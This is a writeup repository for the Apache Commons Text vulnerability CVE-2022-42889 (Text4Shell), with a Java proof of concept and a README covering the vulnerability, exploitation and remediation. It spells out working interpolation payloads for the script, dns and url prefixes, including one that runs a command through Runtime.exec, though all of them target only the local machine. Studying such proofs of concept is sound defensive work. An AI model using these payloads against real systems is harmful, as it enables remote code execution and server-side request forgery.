Writeup for CVE-2022-42889 (Text4Shell)

CVE-2022-42889/Exploit.java

@@ -0,0 +1,19 @@
+import org.apache.commons.text.StringSubstitutor;
+
+public class Exploit {
+    private static void vuln(String input) {
+        System.out.println("Input:  " + input);
+        try {
+            String output = StringSubstitutor.createInterpolator().replace(input);
+            System.out.println("Output: " + output);
+        } catch (Throwable t) {
+            System.out.println("Error:  " + t.getClass().getName() + ": " + t.getMessage());
+        }
+    }
+
+    public static void main(String[] args) {
+        vuln("${script:javascript:java.lang.Runtime.getRuntime().exec('touch ./hacked.txt')}");
+        vuln("${dns:address|localhost}");
+        vuln("${url:UTF-8:http://127.0.0.1:8000/exploit.txt}");
+    }
+}

CVE-2022-42889/README.md

@@ -0,0 +1,54 @@
+# CVE-2022-42889 (Text4Shell)
+
+## Summary
+Apache Commons Text library versions 1.5 through 1.9 contained a vulnerability in the `StringSubstitutor` class that allowed unsafe string interpolation of attacker-controlled input. The library's default configuration contained interpolation prefixes `script`, `dns`, and `url`, which could result in remote code execution or unintentional contact with remote servers.
+
+Artifacts:
+- `Exploit.java`: the java file using the dangerous prefixes to demonstrate the vulnerability
+- `commons-text-1.9.jar`: the vulnerable Apache Commons Text
+- `commons-text-1.10.0.jar`: the patched version of Apache Commons Text
+- `commons-lang3-3.12.0.jar`: dependency required by Apache Commons Text
+- `exploit.txt`: a txt file containing strings to demonstrate the behavior of `url` prefix.
+
+## Vulnerability
+The vulnerability arises because Apache Commons Text enables unsafe prefixes to the default interpolator set.  By passing inputs of the format `${prefix:value}` to `StringSubstitutor.createInterpolator().replace()`, the library resolves the prefix against its registered lookup map and executes the corresponding operation.
+
+When used with unsafe prefixes such as script, dns, and url, this allows for arbitrary code execution, DNS-based data exfiltration, and fetching of arbitrary remote URL content respectively. With maliciously crafted inputs, this could cause unintended behavior including remote code execution, server-side request forgery, or leakage of internal network information.
+
+## Exploitation
+Using the format `${prefix:value}`, an attacker can craft a payload using one of the unsafe interpolation prefixes to cause unintended behavior using the string interpolation of the Apache Commons Text library.
+
+The security impact of the exploitation depends on which prefix is used to pass an input into `StringSubstitutor.createInterpolator().replace(input)`.
+
+### script
+The `script` prefix could result in code execution through Java's built-in engines.
+
+```
+${script:javascript:java.lang.Runtime.getRuntime().exec('touch ./hacked.txt')}
+```
+
+This input will create a new file called `hacked.txt` in the current working directory using the Nashorn engine which is a built-in Javascript engine for Java.
+
+### dns
+The `dns` prefix could perform DNS-related resolution, triggering lookups and possible information leakage or environment probing.
+
+```
+${dns:address|localhost}
+```
+
+This input will resolve the address of localhost, outputting the ip address `127.0.0.1`.
+
+### url
+The `url` prefix could retrieve contents of the specified URL and substitute the returned data into the output string.
+
+```
+${url:UTF-8:http://127.0.0.1:8000/exploit.txt}
+```
+
+By running `python3 -m http.server 8000`, this input will fetch and output the contents of `exploit.txt`.
+
+
+## Remediation
+In versions 1.10.0 and later of Apache Commons Text, the interpolation prefixes `script`, `dns`, and `url` are disabled by default.
+
+These prefixes can still be renabled in the newer versions of Apache Commons Text. This remediation shows that despite the possible dangers of these prefixes, there may be use cases in which they may be intentionally used.

CVE-2022-42889/exploit.txt

@@ -0,0 +1 @@
+CVE-2022-42889 (Text4Shell)